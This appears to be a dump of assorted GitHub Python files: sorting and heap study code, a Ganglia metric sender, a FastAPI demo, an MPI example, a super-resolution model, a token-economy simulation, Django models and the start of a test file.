버블 - n^2\n# 계수(counting) - n\n# 힙 합병 퀵 - nlogn\n\n# 정렬은 면접의 단골 손님\n# : 각 정렬 별 특징, 시간 복잡도\n\n\n\n# 합병 정렬 메인 코드\n\n\n# 합병 정렬\narr = [2,7,5,3,1,5,9,2]\nresult = [0]*8\n\ndef merge(start,end):\n global index,arr,index\n mid = (start+end)//2\n if start >= end: return\n\n # 쪼개기\n merge(start,mid)\n merge(mid+1,end)\n\n a = start\n b = mid + 1\n index = 0\n\n while 1:\n if a > mid and b > end: break\n if a > mid:\n result[index] = arr[b]\n index += 1\n b += 1\n elif b > end:\n result[index] = arr[a]\n index += 1\n a += 1\n elif arr[a]<=arr[b]:\n result[index] = arr[a]\n a += 1\n index += 1\n else:\n result[index]=arr[b]\n b += 1\n index += 1\n\n for i in range(index):\n arr[start+i] = result[i]\n\n\nmerge(0,7)\nprint(*result)\n\n\n# 퀵 정렬\n# 핵심 코드\n# 4 1 7 9 6 3 3 6\narr = list(map(int,input().split()))\npivot = arr[0]\n\na = 1\nb = len(arr) - 1\n\nwhile 1:\n while a < len(arr) and arr[a]<=pivot:\n a += 1\n while b>=0 and arr[b]>pivot:\n b -= 1\n if a > b:\n break\n arr[a],arr[b] = arr[b],arr[a]\narr[0],arr[b] = arr[b],arr[0]\nprint(*arr)\n\n# 완성하면\n\narr = [4,1,7,9,6,3,3,6]\n\ndef quick(start,end):\n if start >= end: return\n\n # 핵심 코드\n pivot=start\n a = start+1\n b=end\n\n while 1:\n while a <= end and arr[a] <= arr[pivot]:\n a+=1\n while b>= start and arr[b] > arr[pivot]:\n b-=1\n if a > b: break\n arr[a],arr[b] = arr[b],arr[a]\n arr[pivot],arr[b] = arr[b],arr[pivot]\n\n\n quick(start,b-1)\n quick(b+1,end)\nquick(0,7)\nprint(*arr)\n\n# 우선순위 큐\nimport heapq # 이걸 쓴다\n# from queue import priorityQueue # 이게 더 느리다\n\narr = [] # 함수 사용 시 이 리스트를 인자로 넘긴다!\n# 루트 노드 이외의 정렬 크게 필요 x\nheapq.heappush(arr,4)\nheapq.heappush(arr,2)\nheapq.heappush(arr,3)\nheapq.heappush(arr,7)\n\n# print(heapq.heappop(arr)) # 우선 순위 높은게 가장 먼저 출력\n# print(heapq.heappop(arr))\n# print(heapq.heappop(arr))\n# print(heapq.heappop(arr))\n\nfor i in range(len(arr)):\n print(heapq.heappop(arr), end=' ')\nprint()\n\nheapq.heappush(arr,4)\nheapq.heappush(arr,2)\nheapq.heappush(arr,3)\nheapq.heappush(arr,7)\nwhile arr:\n node = heapq.heappop(arr)\n print(node,end=' ')\n# 시간 복잡도 logN\n\nprint()\n# 오름차순으로 출력하기 (우선순위큐 사용)\nimport heapq\narr = [234,56,234,1,45,456,23]\nheap = []\nfor i in range(len(arr)):\n heapq.heappush(heap,arr[i])\nfor i in range(len(arr)):\n print(heapq.heappop(heap),end=' ')\n\nprint()\n# 방법 2\nheapq.heapify(arr) #heapify를 이용해서 한번에 heap의 자���형으로 바꾸기 가능\nfor i in range(len(arr)):\n print(heapq.heappop(arr),end=' ')\nprint()\n\n\n# Max heap으로 바꾸기 1\nimport heapq\narr = [34,213,57,1,2,54,2,65]\nheap = []\nfor i in range(len(arr)):\n heapq.heappush(heap,-arr[i]) # arr[i] 값에 음수를 줌(python)\nfor i in range(len(arr)):\n # print(heapq.heappop(heap)*-1)\n print(-heapq.heappop(heap))\n\n# Max heap으로 바꾸기 1-1\nimport heapq\narr = [34,213,57,1,2,54,2,65]\nheap = []\nfor i in range(len(arr)):\n heapq.heappush(heap,(-arr[i],arr[i]))\nfor i in range(len(arr)):\n print(heapq.heappop(heap)[1],end=' ')\nprint()\n# Max heap으로 바꾸기 2\n\nimport heapq\narr = [34,213,57,1,2,54,2,65]\nheap = []\nheap = list(map(lambda x:-x,arr))\nheapq.heapify(heap)\nfor i in range(len(arr)):\n print(-heapq.heappop(heap),end=' ')\nprint()\n\nimport heapq\nn = int(input())\ncard = []\nfor i in range(n):\n heapq.heappush(card,int(input()))\nans = 0\nwhile len(card)>1:\n temp1 = heapq.heappop(card)\n temp2 = heapq.heappop(card)\n ans+=(temp1,temp2)\n heapq.heappush(card,temp1+temp2)\nprint(ans)\n","repo_name":"GureumKim/BOJ","sub_path":"Algos/sort.py","file_name":"sort.py","file_ext":"py","file_size_in_byte":4033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2525268907","text":"from xdrlib import Packer, Unpacker\nimport socket\n\nslope_str2int = {'zero':0,\n 'positive':1,\n 'negative':2,\n 'both':3,\n 'unspecified':4}\n\n# could be autogenerated from previous but whatever\nslope_int2str = {0: 'zero',\n 1: 'positive',\n 2: 'negative',\n 3: 'both',\n 4: 'unspecified'}\n\ndef gmetric_write_meta(HOST, NAME, TYPE, UNITS, SLOPE, TMAX, DMAX, GROUP):\n \"\"\"\n Arguments are in all upper-case to match XML\n \"\"\"\n packer = Packer()\n \"\"\"\n ganglia message formats \n gmetadata_full = 128,\n gmetric_ushort = 129,\n gmetric_short = 130,\n gmetric_int = 131,\n gmetric_uint = 132,\n gmetric_string = 133,\n gmetric_float = 134,\n gmetric_double = 135\n \"\"\"\n packer.pack_int(128) # type gmetadata_full\n packer.pack_string(HOST)\n packer.pack_string(NAME)\n packer.pack_int(0)\n packer.pack_string(TYPE)\n packer.pack_string(NAME)\n packer.pack_string(UNITS)\n packer.pack_int(slope_str2int[SLOPE]) # map slope string to int\n packer.pack_int(TMAX)\n packer.pack_int(DMAX)\n \n packer.pack_int(1)\n packer.pack_string(\"GROUP\")\n packer.pack_string(GROUP)\n \n return packer.get_buffer()\n \ndef gmetric_write(ID, HOST, NAME, VAL):\n \"\"\"\n Arguments are in all upper-case to match XML\n \"\"\"\n packer = Packer()\n packer.pack_int(133)\n packer.pack_string(HOST)\n packer.pack_string(NAME)\n packer.pack_int(0)\n packer.pack_string(\"%s\")\n packer.pack_string(str(VAL))\n \n return packer.get_buffer()\n\ndef gmetric_read(msg):\n unpacker = Unpacker(msg)\n values = dict()\n unpacker.unpack_int()\n values['TYPE'] = unpacker.unpack_string()\n values['NAME'] = unpacker.unpack_string()\n values['VAL'] = unpacker.unpack_string()\n values['UNITS'] = unpacker.unpack_string()\n values['SLOPE'] = slope_int2str[unpacker.unpack_int()]\n values['TMAX'] = unpacker.unpack_uint()\n values['DMAX'] = unpacker.unpack_uint()\n unpacker.done()\n return values\n\nclass GmetricConfig:\n def __init__(self, type, units=\"\", slope=\"both\", tmax=60, dmax=0, group_name=\"\"):\n self.type = type\n self.units = units\n self.slope = slope\n self.tmax = tmax\n self.dmax = dmax\n self.group_name = group_name\n \nclass Gmetric:\n \"\"\"\n Class to send gmetric/gmond 3.1.X packets\n\n Thread safe\n \"\"\"\n\n type = ('', 'string', 'uint16', 'int16', 'uint32', 'int32', 'float',\n 'double', 'timestamp')\n \"\"\"\n\t ganglia message formats \n\t gmetadata_full = 128,\n\t gmetric_ushort = 129,\n\t gmetric_short = 130,\n\t gmetric_int = 131,\n\t gmetric_uint = 132,\n\t gmetric_string = 133,\n\t gmetric_float = 134,\n\t gmetric_double = 135\n \"\"\"\n type_to_id = { '':0, 'string':133, 'uint16':129, 'int16':130, 'int32':131, \n 'uint32':132, 'float':134, 'double':135 }\n protocol = ('udp', 'multicast')\n\n def __init__(self, host, port, protocol):\n if protocol not in self.protocol:\n raise ValueError(\"Protocol must be one of: \" + str(self.protocol))\n\n self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n if protocol == 'multicast':\n self.socket.setsockopt(socket.IPPROTO_IP,\n socket.IP_MULTICAST_TTL, 20)\n self.hostport = (host, int(port))\n #self.socket.connect(self.hostport)\n\n def send_meta(self, NAME, TYPE='', UNITS='', SLOPE='both', TMAX=60, DMAX=0, GROUP=\"\"):\n if SLOPE not in slope_str2int:\n raise ValueError(\"Slope must be one of: \" + str(self.slope.keys()))\n if TYPE not in self.type:\n raise ValueError(\"Type must be one of: \" + str(self.type))\n if len(NAME) == 0:\n raise ValueError(\"Name must be non-empty\")\n # HOST, NAME, TYPE, UNITS, SLOPE, TMAX, DMAX, GROUP\n msg = gmetric_write_meta(self.hostport[0], NAME, TYPE, UNITS, SLOPE, TMAX, DMAX, GROUP)\n return self.socket.sendto(msg, self.hostport)\n\n def send(self, NAME, VAL, TYPE=''):\n if TYPE not in self.type:\n raise ValueError(\"Type must be one of: \" + str(self.type))\n if len(NAME) == 0:\n raise ValueError(\"Name must be non-empty\")\n \n ID = 0\n if self.type in self.type_to_id:\n ID = self.type_to_id[TYPE]\n # ID, HOST, NAME, VAL \n msg = gmetric_write(ID, self.hostport[0], NAME, VAL)\n return self.socket.sendto(msg, self.hostport)\n\nif __name__ == '__main__':\n import optparse\n parser = optparse.OptionParser()\n parser.add_option(\"\", \"--protocol\", dest=\"protocol\", default=\"udp\",\n help=\"The gmetric internet protocol, either udp or multicast, default udp\")\n parser.add_option(\"\", \"--host\", dest=\"host\", default=\"127.0.0.1\",\n help=\"The gmond host to recieve the data\")\n parser.add_option(\"\", \"--port\", dest=\"port\", default=\"8649\",\n help=\"The gmond port to recieve the data\")\n parser.add_option(\"\", \"--name\", dest=\"name\", default=\"\",\n help=\"The name of the metric\")\n parser.add_option(\"\", \"--value\", dest=\"value\", default=\"\",\n help=\"The value of the metric\")\n parser.add_option(\"\", \"--units\", dest=\"units\", default=\"\",\n help=\"The units for the value, e.g. 'kb/sec'\")\n parser.add_option(\"\", \"--slope\", dest=\"slope\", default=\"both\",\n help=\"The sign of the derivative of the value over time, one of zero, positive, negative, both, default both\")\n parser.add_option(\"\", \"--type\", dest=\"type\", default=\"\",\n help=\"The value data type, one of string, int8, uint8, int16, uint16, int32, uint32, float, double\")\n parser.add_option(\"\", \"--tmax\", dest=\"tmax\", default=\"60\",\n help=\"The maximum time in seconds between gmetric calls, default 60\")\n parser.add_option(\"\", \"--dmax\", dest=\"dmax\", default=\"0\",\n help=\"The lifetime in seconds of this metric, default=0, meaning unlimited\")\n (options,args) = parser.parse_args()\n\n g = Gmetric(options.host, options.port, options.protocol)\n g.send_meta(options.name, options.type, options.units, options.slope)\n g.send(options.name, options.value, options.type, options.units,\n options.slope, options.tmax, options.dmax)\n","repo_name":"xstevens/gruneberg","sub_path":"gruneberg/gmetric.py","file_name":"gmetric.py","file_ext":"py","file_size_in_byte":6451,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"20838366580","text":"#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nMain program\nCreated on Sep 06 2022\n@author: Jesús Cid-Sueiro\n\"\"\"\n\nimport pathlib\nimport argparse\nimport inspect\nimport yaml\n\n# Local imports\nfrom src.menu_navigator.menu_navigator import MenuNavigator\nfrom src.task_manager import TaskManagerIMT # , TaskManagerCMD\n\n\n# ########################\n# Main body of application\ndef main():\n\n # ################\n # Get menu options\n\n # Get the menu options from a options_menu file.\n path2menu = pathlib.Path('config', 'options_menu.yaml')\n # This is a fake menu because it is used only to get the list of options\n options = MenuNavigator(None, path2menu).get_options(tasks_only=True)\n # option_names = [x[0] for x in options]\n options_txt = \"\\n\".join([f' - {x[0]}: {x[1]}' for x in options])\n\n # ####################\n # Read input arguments\n\n # Read input arguments\n parser = argparse.ArgumentParser(\n formatter_class=argparse.RawTextHelpFormatter)\n parser.add_argument(\n '--task', required=True,\n help=f\"Command/task to be executed. It must be one of the following:\"\n f\"\\n{options_txt}\")\n parser.add_argument(\n '--p', required=True,\n help=\"path to a new or an existing project\")\n parser.add_argument(\n '--source', default=\"../datasets\",\n help=\"path to the source data folder\")\n parser.add_argument(\n '--zeroshot', default='../zero_shot_model/Sciro-Shot',\n help=\"path to the zero-shot model folder\")\n parser.add_argument(\n '--class_name',\n help=\"Name of the labeled dataset\")\n parser.add_argument(\n '-i', '--ignore_IMT_root_path', action='store_true',\n help=\"Use the project path as it is, ignoring the imt root\")\n args, other_args = parser.parse_known_args()\n\n # ################################################\n # Read input arguments for the task manager method\n\n # This if is used to avoid the cases which would re-read parameter\n # class_name, because it has been already read, raising an error\n if args.task not in {'load_labels', 'reset_labels'}:\n params = inspect.getfullargspec(getattr(TaskManagerIMT, args.task))\n n_params = len(params.args)\n n_defaults = 0 if params.defaults is None else len(params.defaults)\n\n # Index starts from 1 because argument 0 is 'self'\n arg_names = params.args[1:n_params - n_defaults]\n kwarg_names = params.args[n_params - n_defaults:]\n default_values = [] if n_defaults == 0 else params.defaults\n\n for arg in arg_names:\n arg_type = str # Default\n if arg in params.annotations:\n arg_type = params.annotations[arg]\n parser.add_argument(f'--{arg}', type=arg_type, required=True)\n\n for arg, value in zip(kwarg_names, default_values):\n arg_type = str # Default\n if arg in params.annotations:\n arg_type = params.annotations[arg]\n parser.add_argument(f'--{arg}', type=arg_type, default=value)\n\n args = parser.parse_args()\n\n # Create task manager object\n if args.ignore_IMT_root_path:\n project_path = pathlib.Path(args.p)\n else:\n # This is used for the IMT: the project path is rooted into a default\n # project path taken from the parameters.default.yaml.\n # FIXME: This must be changed, because I do not think it is a good idea\n # to take parameters from a file of default values.\n with open('config/parameters.default.yaml', 'r', encoding='utf8') as f:\n parameter_default = yaml.safe_load(f)\n project_path = pathlib.Path(\n parameter_default['project_folder_path']) / pathlib.Path(args.p)\n\n tm = TaskManagerIMT(project_path, path2source=args.source,\n path2zeroshot=args.zeroshot)\n\n # #####################\n # Run preparation tasks\n\n # If the task is load or create, we simply need to run it.\n if args.task not in {'create', 'load'}:\n\n # Load or create project\n if project_path.is_dir():\n tm.load()\n else:\n tm.create()\n\n # Load labels if the task requires it\n options_needing_labels = {\n 'load_labels', 'evaluate_PUlabels', 'train_PUmodel',\n 'evaluate_PUmodel', 'performance_metrics_PU',\n 'performance_metrics_PN', 'get_feedback', 'sample_documents',\n 'get_labels_from_docs', 'annotate', 'retrain_model',\n 'reevaluate_model', 'import_annotations', 'export_annotations',\n # Options added for the IMT:\n 'inference', 'on_retrain', 'on_classify', 'on_evaluate',\n 'on_sample', 'on_save_feedback'}\n\n option = args.task\n if option in options_needing_labels:\n if args.class_name is not None:\n tm.load_labels(args.class_name)\n else:\n raise TypeError(\n f\"Task {args.task} requires argument --class_name\")\n\n # ########\n # Run task\n if args.task not in {'load_labels', 'reset_labels'}:\n\n # Get args\n arg_values = [getattr(args, name) for name in arg_names]\n\n # Get kwargs\n # - default values\n kwargs = dict(zip(kwarg_names, default_values))\n # - user-defined values\n for arg in kwarg_names:\n if arg in args:\n kwargs[arg] = getattr(args, arg)\n\n # Run task\n getattr(tm, args.task)(*arg_values, **kwargs)\n\n # If the task is reset_labels run it with the class name.\n elif args.task == 'reset_labels':\n tm.reset_labels(args.class_name)\n\n # The case load_labels is ignored, because that task has been already done.\n\n # TEST PENDING:\n # - get_feedback: Get relevance feedback from user\n # - evaluate_PUlabels: Evaluate subcorpus with respect to a gold standard\n # - evaluate_PUmodel: Evaluate PU classifier model with the available labs\n # - retrain_model: Retrain model with manual annotations\n # - reevaluate_model: Evaluate retrained model.\n # - performance_metrics_PN: Show all performance metrics\n # - import_annotations: Import annotations (overwrites existing annots)\n # - export_annotations: Export annotations (delete older annot files)\n\n print(\"\\n*** END.\\n\")\n\n return\n\n\n# ############\n# Execute main\nif __name__ == '__main__':\n main()\n","repo_name":"IntelCompH2020/domain_classification","sub_path":"run_dc_task.py","file_name":"run_dc_task.py","file_ext":"py","file_size_in_byte":6416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1274273645","text":"from fastapi import FastAPI\n\nfrom pydantic import BaseModel\n\ntags_metadata = [\n {\n \"name\": \"users\",\n \"description\": \"Operations with users. The **login** logic is also here.\",\n },\n {\n \"name\": \"items\",\n \"description\": \"Manage items. So _fancy_ they have their own docs.\",\n \"externalDocs\": {\n \"description\": \"Items external docs\",\n \"url\": \"https://fastapi.tiangolo.com/\",\n },\n },\n]\n\napp = FastAPI(title=\"langolango\", openapi_tags=tags_metadata)\n\n# Rota Raiz\n@app.get(\"/\")\ndef raiz():\n return {\"Ola\": \"Mundo\"}\n\n# Criar model\n\nclass Usuario(BaseModel):\n id: int\n email: str\n senha: str\n\n#Criar Base de Dados\n\nbase_de_dados = [\n Usuario(id=1, email=\"fernando@teste.com.br\", senha=\"1234\"),\n Usuario(id=2, email=\"fernando2@teste.com.br\", senha=\"1234\")\n]\n\n#Rota Get All\n\n@app.get(\"/Usuarios\")\ndef get_todos_os_usuarios():\n return base_de_dados\n\n#Rota Get Id\n@app.get(\"/Usuarios/{id_usuario}\")\ndef get_usuario_usando_id(id_usuario: int):\n for usuario in base_de_dados:\n if (usuario.id == id_usuario):\n return usuario\n return {\"status\": 404, \"Mensagem\": \"Não encontrou usuario\"}\n\n#Rota insere\n@app.post(\"/usuarios\")\ndef insere_usuario(usuario: Usuario):\n\n #Criar regras de negocio\n base_de_dados.append(usuario)\n return usuario","repo_name":"lemosfo/learning-python","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3430133980","text":"# Complete the find_indexes function which accepts two\n# parameters, a list and a search term. It returns a new\n# list that contains the indexes of the search term in\n# the search list.\n#\n# Remember that indexes in Python are zero-based. That\n# means the first element in the list is index 0.\n#\n# Examples:\n# * search_list: [1, 2, 3, 4, 5]\n# search_term: 4\n# result: [3]\n# * search_list: [1, 2, 3, 4, 5]\n# search_term: 6\n# result: []\n# * search_list: [1, 2, 1, 2, 1]\n# search_term: 1\n# result: [0, 2, 4]\n#\n# Look up the enumerate function to help you with this problem.\n\ndef find_indexes(search_list, search_term):\n result = []\n #create result list\n # for loop\n for item in search_list:\n if item == search_term:\n # print(item)\n # print(search_list.index(item))\n #if == search term then\n #find index and append to result list\n result.append(search_list.index(item))\n # print(result)\n return result\n #return result list\n\nprint(find_indexes([1, 2, 3, 4, 5], 4))\nprint(find_indexes([1, 2, 3, 4, 5], 6))\n","repo_name":"Joesirven/python-practice-2","sub_path":"problems/problem_043.py","file_name":"problem_043.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71862797992","text":"import tkinter as tk\nfrom gui import GUI\nfrom chess import Chess\n\n\ndef main():\n chess = Chess()\n\n root = tk.Tk()\n root.title(\"Chess\")\n gui = GUI(root, chess)\n gui.pack()\n root.mainloop()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ctgk/chess-python","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"43063883819","text":"# Package MPI\nfrom mpi4py import MPI\n# nombre de processus et rang parmis ceux ci\nnprocs = MPI.COMM_WORLD.size\np = MPI.COMM_WORLD.rank\n# creation du message a envoyer\nsmessage = 100+p\n# Envoi\n# Si le processus courant a un successeur, i.e. si le rang n'est pas nprocs-1\nif p != nprocs - 1:\n# Envoi du message au sucesseur\n MPI.COMM_WORLD.send(smessage,dest=p+1)\n# Reception\n# Si le processus courant a un predecesseur, i.e. si le rang n'est pas 0\nif p != 0:\n# reception du message envoye par le predecesseur\n rmessage = MPI.COMM_WORLD.recv(source=p-1)\n print(p,rmessage)\n","repo_name":"broqunic/m1sid-2020","sub_path":"TPs/JdV/testmpi.py","file_name":"testmpi.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19277036870","text":"import tensorflow as tf\nimport tensorflow.keras.backend as K\nfrom tensorflow.keras.models import *\nfrom tensorflow.keras.layers import *\nfrom tensorflow.keras.optimizers import *\nfrom tensorflow.keras.activations import *\nfrom tensorflow.keras.regularizers import *\nfrom tensorflow.keras.initializers import *\nfrom tensorflow.keras.utils import get_custom_objects\n\n\ndef RCNN(inputShape=(128, 128, 3), scale=2, g=10, b=20):\n def SEBlock(x, reduction=16):\n _x = GlobalAveragePooling2D()(x)\n _x = Conv2D(x.shape[-1] // reduction, 1, padding=\"same\", use_bias=True, activation=\"relu\")(_x[:, None, None, :])\n _x = Conv2D(x.shape[-1], 1, padding=\"same\", use_bias=True, activation=\"sigmoid\")(_x)\n return Multiply()([x, _x])\n\n def RCAB(x, reduction=16):\n _x = Conv2D(x.shape[-1], 3, activation=\"relu\", padding=\"same\")(x)\n _x = Conv2D(x.shape[-1], 3, padding=\"same\")(_x)\n _x = SEBlock(_x, reduction=reduction)\n return Add()([x, _x])\n\n def RG(x, b=20, reduction=16):\n _x = RCAB(x, reduction=reduction)\n for _ in range(b - 1):\n _x = RCAB(_x, reduction=reduction)\n _x = Conv2D(x.shape[-1], 3, padding=\"same\")(_x)\n return Add()([x, _x])\n\n def RIR(x, g=10, b=20, reduction=16):\n _x = RG(x, b=b, reduction=reduction)\n for _ in range(g - 1):\n _x = RG(_x, b=b, reduction=reduction)\n _x = Conv2D(x.shape[-1], 3, padding=\"same\")(_x)\n return Add()([x, _x])\n\n i = Input(inputShape)\n x = Conv2D(64, 3, padding=\"same\")(i)\n x = RIR(x, g=g, b=b, reduction=16)\n x = Conv2D(3 * (scale ** 2), 3, padding=\"same\")(x)\n o = Lambda(tf.nn.depth_to_space, arguments={\"block_size\": scale}, name=\"PixelShuffle\")(x)\n\n model = Model(i, o)\n model.summary()\n\n\nif __name__ == \"__main__\":\n model = RCNN()\n","repo_name":"3017218062/Image-Super-Resolution_DeepLearning","sub_path":"work/RCAN.py","file_name":"RCAN.py","file_ext":"py","file_size_in_byte":1831,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"2024291557","text":"from django.contrib.auth import get_user_model\nfrom rest_framework import serializers\n\n__all__ = (\n 'UserSerializer',\n)\n\nUser = get_user_model()\n\n\nclass UserSerializer(serializers.ModelSerializer):\n class Meta:\n model = User\n fields = (\n 'username',\n 'create_at',\n )\n","repo_name":"HiFaMi/Monster_Hunter_DB","sub_path":"app/members/serializers/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"73608581672","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Nov 18 12:17:07 2022\n\n@author: stylianoskampakis\n\"\"\"\nfrom typing import List, Dict,Union\nimport numpy as np\nimport pandas as pd\n\n \n\nclass AddOn():\n \"\"\"\n Class which is used within controllers to affect certain internal parameters (e.g. noise)\n \"\"\"\n \n def __init__(self):\n \n pass\n \n \n def apply(self)->float:\n \n pass\n \nclass Initialisable():\n \n def __init__(self):\n self.initialised=False\n \n def initialise(self):\n \n self.initialised=True\n \n\nclass Controller():\n \n \"\"\"\n Base class for all the sub-components of a simulation within a token economy\n \"\"\"\n \n def __init__(self,name:str=None):\n self.name=name\n self.iteration=0\n self.max_iteration=None\n self.dependencies={}\n pass\n \n # def is_independent(self):\n # return isinstance(usm,Independent)\n \n \n def link(self,dependency_parent,dependency_instance)->bool:\n \n if hasattr(self,'dependencies'):\n if isinstance(dependency_instance,dependency_parent):\n self.dependencies[dependency_parent]= dependency_instance\n else:\n raise Exception('Tried to link incompatible type.')\n \n return True\n \n def test_integrity(self)->bool:\n \"\"\"\n Tests whether all dependencies have a linked object or not.\n \n The type of the link object is already checked in the link function.\n \"\"\"\n nones=0\n if len(self.dependencies.keys())>0:\n for k in self.dependencies.keys():\n if self.dependencies[k] is None:\n nones+=1\n if nones==len(self.dependencies.keys()):\n return False\n \n return True\n \n def get_dependencies(self):\n \n print('Dependencies names are: ')\n for d in self.dependencies.keys():\n try:\n print(self.dependencies[d].name)\n except:\n print('None')\n \n return self.dependencies\n \n \n def __getitem__(self,item):\n return getattr(self,item)\n \n \nclass AgentPool(Controller):\n \n def __init__(self):\n \n self.num_users=0\n self.transactions=0\n self.iteration=0\n self.currency=None\n self.name=None\n self.dependencies={TokenEconomy:None}\n #This is a mechanism that enables agent pools to generate new pools\n #The new pools need to change at the execute() function, and follow a format like\n #[('AgentPool',object),('SupplyPool':object)]\n self.new_pools = []\n \n \n\n def __print__(self)->str:\n users=self.num_users\n trans=self.transactions_controller.transactions_value\n \n return str(users)+'\\n'+str(trans)\n \n def report(self)->Dict:\n \"\"\"\n Returns user and transaction data from the current iteration\n \"\"\"\n rep={'users':self.num_users,'transactions':self.transactions_controller.transactions_value}\n \n \n return rep\n \n def get_transactions(self)->float:\n \n return self.transactions\n \n def get_num_users(self)->int:\n \n return self.num_users\n \n def reset(self)->None:\n \n self.iteration=0\n \n def execute(self)->list:\n \n return self.new_pools\n \n\nclass TokenEconomy():\n \"\"\"\n Base class for the simulation\n \"\"\"\n \n def __init__(self,\n holding_time:Union[float,Controller],supply:Union[float,Controller],\n fiat:str,token:str,\n unit_of_time:str,price_function:Controller,token_initial_price:List,adapt_supply_to_token_sales:bool=False,\n name:str=None)->None:\n \n \"\"\"\n fiat: the fiat currency used to denominate the economy\n tokens: a list of the token synmbols\n holding time: the average holding time denominated in the unit of time, used for calculation of the price\n unit_of_time: the unit of time for the simulation\n price_function: the price function used to simulate the price(e.g. equation of exchange)\n token_initial_price: the initial price for each token denominated in fiat\n \"\"\"\n self.fiat=fiat\n self.token=token\n self._price_function=price_function\n \n self.unit_of_time=unit_of_time\n \n self.adapt_supply_to_token_sales=adapt_supply_to_token_sales\n\n self._holding_time_controller=holding_time\n\n self._supply=supply\n self._supply_pools=[]\n self._supply_store=[]\n \n self._agent_pools=[]\n \n self._num_users_store=[]\n self.num_users=0\n\n \n self._transactions_value_store_in_fiat=[]\n \n self._transactions_value_store_in_tokens={}\n self.prices={}\n # for tok in tokens:\n # self._transactions_value_store_in_tokens[tok]=[]\n # self.prices[tok]=None\n \n self._transactions_value_store_in_tokens=[]\n self.price=token_initial_price\n \n self._prices_store=[]\n self.iteration=0\n \n self.transactions_volume_in_tokens=0\n self.transactions_value_in_fiat=0\n \n self.holding_time=None \n self._holding_time_store=[]\n \n self._effective_holding_time_store=[]\n \n self._treasury_store = []\n \n self.name = name\n \n return None\n \n def execute(self):\n \n pass\n \n def get_state(self)->Dict:\n \n state={'transactions_'+self.fiat:self.transactions_value_in_fiat,'supply':self.supply,\n 'holding_time':self.holding_time,'num_users':self.num_users}\n \n state['transactions_'+self.token]=self.transactions_volume_in_tokens\n state[self.token+'_price']=self.price\n \n return state\n \n def __getitem__(self,item):\n return getattr(self,item)\n","repo_name":"stelios12312312/TokenLab","sub_path":"src/TokenLab/simulationcomponents/baseclasses.py","file_name":"baseclasses.py","file_ext":"py","file_size_in_byte":6114,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"42655657397","text":"from __future__ import unicode_literals\nfrom django.db import models\n\n\nclass Projeto(models.Model):\n nome = models.CharField(verbose_name=u\"Nome Projeto\", max_length=100)\n link = models.CharField(verbose_name=u\"Link\", max_length=100)\n dataInicio = models.DateField(verbose_name=u\"Data Inicio\", auto_now_add=False)\n dataFim = models.DateField(verbose_name=u\"Data Fim\", auto_now_add=False, null=True, blank=True)\n descricao = models.TextField(verbose_name=u\"Descrição\", null=True, blank=True)\n\n def __str__(self):\n return self.nome\n\n class Meta:\n ordering = [\"nome\"]\n verbose_name_plural = \"Projetos\"\n\n\nclass Conhecimento(models.Model):\n nome = models.CharField(verbose_name=u\"Nome Conhecimento\", max_length=100)\n nivel = models.PositiveIntegerField(verbose_name=u\"Nivel Conhecimento\", default=0)\n\n def __str__(self):\n return self.nome\n\n class Meta:\n ordering = [\"nome\"]\n verbose_name_plural = \"Conhecimentos\"\n\n\nclass DadosPessoal(models.Model):\n imagen = models.ImageField(verbose_name=u\"Imagem Perfil\", upload_to='pic_folder/')\n nome = models.CharField(verbose_name=u\"Nome \", max_length=100)\n idade = models.PositiveIntegerField(verbose_name=u\"Idade\")\n email = models.EmailField(verbose_name=u\"E-mail\")\n github = models.CharField(verbose_name=u\"github\", max_length=100, null=True, blank=True)\n linkdin = models.CharField(verbose_name=u\"linkdin\", max_length=100, null=True, blank=True)\n ddd = models.CharField(verbose_name=u\"DDD\", max_length=3)\n celuar = models.CharField(verbose_name=u\"celeular\", max_length=9)\n descricao = models.TextField(verbose_name=u\"Descrição\", null=True, blank=True)\n conhecimento = models.ManyToManyField(Conhecimento, related_name=\"conhecimento\", verbose_name=u\"Conhecomento\")\n projetos = models.ManyToManyField(Projeto, related_name=\"projetos\", verbose_name=u\"Projetos\")\n dataNacimento = models.DateField(verbose_name=u'Data Nascimento', auto_now=False)\n\n def __str__(self):\n return self.nome\n\n class Meta:\n ordering = [\"nome\"]\n verbose_name_plural = \"DadosPessoais\"\n","repo_name":"DiegoDigo/portfolio","sub_path":"home/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2138,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6544180018","text":"import unittest\n\nimport pandas as pd\nimport numpy as np\nfrom pandas.api.types import is_categorical_dtype, is_numeric_dtype\n\nfrom sklearn.ensemble import RandomForestClassifier\n\nimport plotly.graph_objects as go\n\nfrom explainerdashboard.explainers import ClassifierExplainer\nfrom explainerdashboard.datasets import titanic_survive, titanic_names\n\n\nclass ClassifierExplainerTests(unittest.TestCase):\n def setUp(self):\n X_train, y_train, X_test, y_test = titanic_survive()\n train_names, test_names = titanic_names()\n\n model = RandomForestClassifier(n_estimators=5, max_depth=2)\n model.fit(X_train, y_train)\n\n 